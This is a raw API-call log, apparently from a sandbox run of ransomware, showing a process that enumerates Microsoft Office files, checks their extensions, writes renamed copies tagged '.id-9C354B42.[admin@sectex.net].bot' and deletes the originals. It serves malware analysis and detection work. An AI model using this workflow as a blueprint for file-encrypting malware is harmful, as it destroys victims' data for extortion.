	[0158.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM") returned 65
	[0158.591] lstrlenW (lpString=".jpg") returned 4
	[0158.591] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0158.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM") returned 65
	[0158.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM") returned 65
	[0158.591] lstrlenW (lpString=".doc") returned 4
	[0158.591] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0158.591] lstrlenW (lpString=".docx") returned 5
	[0158.591] lstrcmpiW (lpString1=".docx", lpString2="R.SAM") returned -1
	[0158.591] lstrlenW (lpString=".pdf") returned 4
	[0158.591] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0158.591] lstrlenW (lpString=".xls") returned 4
	[0158.592] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0158.592] lstrlenW (lpString=".xlsx") returned 5
	[0158.592] lstrcmpiW (lpString1=".xlsx", lpString2="R.SAM") returned -1
	[0158.592] lstrlenW (lpString=".ppt") returned 4
	[0158.592] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0158.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM") returned 65
	[0158.592] lstrlenW (lpString=".zip") returned 4
	[0158.592] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0158.592] lstrlenW (lpString=".rar") returned 4
	[0158.592] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0158.592] lstrlenW (lpString=".bz2") returned 4
	[0158.592] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0158.592] lstrlenW (lpString=".7z") returned 3
	[0158.592] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0158.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM") returned 65
	[0158.592] lstrlenW (lpString=".dbf") returned 4
	[0158.592] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0158.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM") returned 65
	[0158.592] lstrlenW (lpString=".1cd") returned 4
	[0158.592] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0158.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM") returned 65
	[0158.592] lstrlenW (lpString=".jpg") returned 4
	[0158.592] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0158.592] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0158.592] lstrlenW (lpString="TRANSMRR.DLL") returned 12
	[0158.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\TRANSMRR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\transmrr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0158.647] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=13712) returned 1
	[0158.647] CloseHandle (hObject=0x37c) returned 1
	[0158.647] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\TRANSMRR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\transmrr.dll")) returned 0x20
	[0158.647] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\TRANSMRR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\transmrr.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.647] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\TRANSMRR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\transmrr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0158.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\TRANSMRR.DLL") returned 68
	[0158.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\TRANSMRR.DLL") returned 68
	[0158.647] lstrlenW (lpString=".doc") returned 4
	[0158.647] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0158.647] lstrlenW (lpString=".docx") returned 5
	[0158.647] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0158.647] lstrlenW (lpString=".pdf") returned 4
	[0158.647] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0158.647] lstrlenW (lpString=".xls") returned 4
	[0158.647] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0158.647] lstrlenW (lpString=".xlsx") returned 5
	[0158.647] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0158.647] lstrlenW (lpString=".ppt") returned 4
	[0158.647] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0158.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\TRANSMRR.DLL") returned 68
	[0158.648] lstrlenW (lpString=".zip") returned 4
	[0158.648] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0158.648] lstrlenW (lpString=".rar") returned 4
	[0158.648] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0158.648] lstrlenW (lpString=".bz2") returned 4
	[0158.648] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0158.648] lstrlenW (lpString=".7z") returned 3
	[0158.648] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0158.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\TRANSMRR.DLL") returned 68
	[0158.648] lstrlenW (lpString=".dbf") returned 4
	[0158.648] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0158.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\TRANSMRR.DLL") returned 68
	[0158.648] lstrlenW (lpString=".1cd") returned 4
	[0158.649] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0158.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\TRANSMRR.DLL") returned 68
	[0158.649] lstrlenW (lpString=".jpg") returned 4
	[0158.649] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0158.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\TRANSMRR.DLL") returned 68
	[0158.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\TRANSMRR.DLL") returned 68
	[0158.649] lstrlenW (lpString=".doc") returned 4
	[0158.649] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0158.649] lstrlenW (lpString=".docx") returned 5
	[0158.649] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0158.649] lstrlenW (lpString=".pdf") returned 4
	[0158.649] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0158.649] lstrlenW (lpString=".xls") returned 4
	[0158.649] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0158.649] lstrlenW (lpString=".xlsx") returned 5
	[0158.649] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0158.649] lstrlenW (lpString=".ppt") returned 4
	[0158.649] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0158.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\TRANSMRR.DLL") returned 68
	[0158.649] lstrlenW (lpString=".zip") returned 4
	[0158.649] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0158.649] lstrlenW (lpString=".rar") returned 4
	[0158.649] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0158.649] lstrlenW (lpString=".bz2") returned 4
	[0158.649] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0158.649] lstrlenW (lpString=".7z") returned 3
	[0158.649] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0158.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\TRANSMRR.DLL") returned 68
	[0158.649] lstrlenW (lpString=".dbf") returned 4
	[0158.649] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0158.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\TRANSMRR.DLL") returned 68
	[0158.650] lstrlenW (lpString=".1cd") returned 4
	[0158.650] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0158.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\TRANSMRR.DLL") returned 68
	[0158.650] lstrlenW (lpString=".jpg") returned 4
	[0158.650] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0158.650] lstrcmpiW (lpString1=".SAM", lpString2=".bot") returned 1
	[0158.650] lstrlenW (lpString="DESKSAM.SAM") returned 11
	[0158.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\desksam.sam"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0158.699] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=23424) returned 1
	[0158.699] CloseHandle (hObject=0x3b8) returned 1
	[0158.699] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\desksam.sam")) returned 0x20
	[0158.740] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\desksam.sam.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\desksam.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0158.956] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.956] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\desksam.sam.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0158.958] GetLastError () returned 0x0
	[0158.958] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x5b80, lpOverlapped=0x0) returned 1
	[0159.025] WriteFile (in: hFile=0x3c0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x5b90, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x5b90, lpOverlapped=0x0) returned 1
	[0159.026] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.026] WriteFile (in: hFile=0x3c0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0159.026] SetEndOfFile (hFile=0x3c0) returned 1
	[0159.026] CloseHandle (hObject=0x3c0) returned 1
	[0159.026] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.026] SetEndOfFile (hFile=0x3f0) returned 1
	[0159.028] CloseHandle (hObject=0x3f0) returned 1
	[0159.029] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.029] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\desksam.sam")) returned 1
	[0159.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM") returned 62
	[0159.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM") returned 62
	[0159.029] lstrlenW (lpString=".doc") returned 4
	[0159.029] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0159.030] lstrlenW (lpString=".docx") returned 5
	[0159.030] lstrcmpiW (lpString1=".docx", lpString2="M.SAM") returned -1
	[0159.030] lstrlenW (lpString=".pdf") returned 4
	[0159.030] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0159.030] lstrlenW (lpString=".xls") returned 4
	[0159.030] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0159.030] lstrlenW (lpString=".xlsx") returned 5
	[0159.030] lstrcmpiW (lpString1=".xlsx", lpString2="M.SAM") returned -1
	[0159.030] lstrlenW (lpString=".ppt") returned 4
	[0159.030] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0159.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM") returned 62
	[0159.030] lstrlenW (lpString=".zip") returned 4
	[0159.030] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0159.030] lstrlenW (lpString=".rar") returned 4
	[0159.030] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0159.030] lstrlenW (lpString=".bz2") returned 4
	[0159.030] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0159.030] lstrlenW (lpString=".7z") returned 3
	[0159.030] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0159.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM") returned 62
	[0159.030] lstrlenW (lpString=".dbf") returned 4
	[0159.030] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0159.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM") returned 62
	[0159.030] lstrlenW (lpString=".1cd") returned 4
	[0159.030] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0159.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM") returned 62
	[0159.030] lstrlenW (lpString=".jpg") returned 4
	[0159.030] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0159.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM") returned 62
	[0159.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM") returned 62
	[0159.031] lstrlenW (lpString=".doc") returned 4
	[0159.031] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0159.031] lstrlenW (lpString=".docx") returned 5
	[0159.031] lstrcmpiW (lpString1=".docx", lpString2="M.SAM") returned -1
	[0159.031] lstrlenW (lpString=".pdf") returned 4
	[0159.031] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0159.031] lstrlenW (lpString=".xls") returned 4
	[0159.031] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0159.031] lstrlenW (lpString=".xlsx") returned 5
	[0159.031] lstrcmpiW (lpString1=".xlsx", lpString2="M.SAM") returned -1
	[0159.031] lstrlenW (lpString=".ppt") returned 4
	[0159.031] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0159.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM") returned 62
	[0159.031] lstrlenW (lpString=".zip") returned 4
	[0159.031] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0159.031] lstrlenW (lpString=".rar") returned 4
	[0159.031] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0159.031] lstrlenW (lpString=".bz2") returned 4
	[0159.031] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0159.031] lstrlenW (lpString=".7z") returned 3
	[0159.031] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0159.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM") returned 62
	[0159.031] lstrlenW (lpString=".dbf") returned 4
	[0159.031] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0159.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM") returned 62
	[0159.031] lstrlenW (lpString=".1cd") returned 4
	[0159.031] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0159.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM") returned 62
	[0159.031] lstrlenW (lpString=".jpg") returned 4
	[0159.031] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0159.042] lstrcmpiW (lpString1=".FAE", lpString2=".bot") returned 1
	[0159.042] lstrlenW (lpString="OLMAIL.FAE") returned 10
	[0159.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olmail.fae"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0159.077] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=63384) returned 1
	[0159.077] CloseHandle (hObject=0x388) returned 1
	[0159.077] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olmail.fae")) returned 0x20
	[0159.077] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olmail.fae.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olmail.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0159.077] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.077] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olmail.fae.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0159.078] GetLastError () returned 0x0
	[0159.078] ReadFile (in: hFile=0x388, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xf798, lpOverlapped=0x0) returned 1
	[0159.085] WriteFile (in: hFile=0x1d8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf7a0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf7a0, lpOverlapped=0x0) returned 1
	[0159.087] ReadFile (in: hFile=0x388, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.087] WriteFile (in: hFile=0x1d8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0159.087] SetEndOfFile (hFile=0x1d8) returned 1
	[0159.087] CloseHandle (hObject=0x1d8) returned 1
	[0159.087] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.087] SetEndOfFile (hFile=0x388) returned 1
	[0159.092] CloseHandle (hObject=0x388) returned 1
	[0159.092] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.123] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olmail.fae")) returned 1
	[0159.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE") returned 61
	[0159.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE") returned 61
	[0159.124] lstrlenW (lpString=".doc") returned 4
	[0159.124] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0159.124] lstrlenW (lpString=".docx") returned 5
	[0159.124] lstrcmpiW (lpString1=".docx", lpString2="L.FAE") returned -1
	[0159.124] lstrlenW (lpString=".pdf") returned 4
	[0159.124] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0159.124] lstrlenW (lpString=".xls") returned 4
	[0159.124] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0159.124] lstrlenW (lpString=".xlsx") returned 5
	[0159.124] lstrcmpiW (lpString1=".xlsx", lpString2="L.FAE") returned -1
	[0159.124] lstrlenW (lpString=".ppt") returned 4
	[0159.124] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0159.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE") returned 61
	[0159.124] lstrlenW (lpString=".zip") returned 4
	[0159.124] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0159.124] lstrlenW (lpString=".rar") returned 4
	[0159.124] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0159.124] lstrlenW (lpString=".bz2") returned 4
	[0159.124] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0159.124] lstrlenW (lpString=".7z") returned 3
	[0159.124] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0159.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE") returned 61
	[0159.125] lstrlenW (lpString=".dbf") returned 4
	[0159.125] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0159.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE") returned 61
	[0159.125] lstrlenW (lpString=".1cd") returned 4
	[0159.125] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0159.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE") returned 61
	[0159.125] lstrlenW (lpString=".jpg") returned 4
	[0159.125] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0159.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE") returned 61
	[0159.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE") returned 61
	[0159.125] lstrlenW (lpString=".doc") returned 4
	[0159.125] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0159.125] lstrlenW (lpString=".docx") returned 5
	[0159.125] lstrcmpiW (lpString1=".docx", lpString2="L.FAE") returned -1
	[0159.125] lstrlenW (lpString=".pdf") returned 4
	[0159.125] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0159.125] lstrlenW (lpString=".xls") returned 4
	[0159.125] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0159.125] lstrlenW (lpString=".xlsx") returned 5
	[0159.125] lstrcmpiW (lpString1=".xlsx", lpString2="L.FAE") returned -1
	[0159.125] lstrlenW (lpString=".ppt") returned 4
	[0159.125] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0159.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE") returned 61
	[0159.125] lstrlenW (lpString=".zip") returned 4
	[0159.125] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0159.125] lstrlenW (lpString=".rar") returned 4
	[0159.125] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0159.125] lstrlenW (lpString=".bz2") returned 4
	[0159.125] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0159.126] lstrlenW (lpString=".7z") returned 3
	[0159.126] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0159.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE") returned 61
	[0159.126] lstrlenW (lpString=".dbf") returned 4
	[0159.126] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0159.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE") returned 61
	[0159.126] lstrlenW (lpString=".1cd") returned 4
	[0159.126] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0159.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE") returned 61
	[0159.126] lstrlenW (lpString=".jpg") returned 4
	[0159.126] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0159.126] lstrcmpiW (lpString1=".FAE", lpString2=".bot") returned 1
	[0159.126] lstrlenW (lpString="OLTASK.FAE") returned 10
	[0159.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oltask.fae"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0159.133] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=115608) returned 1
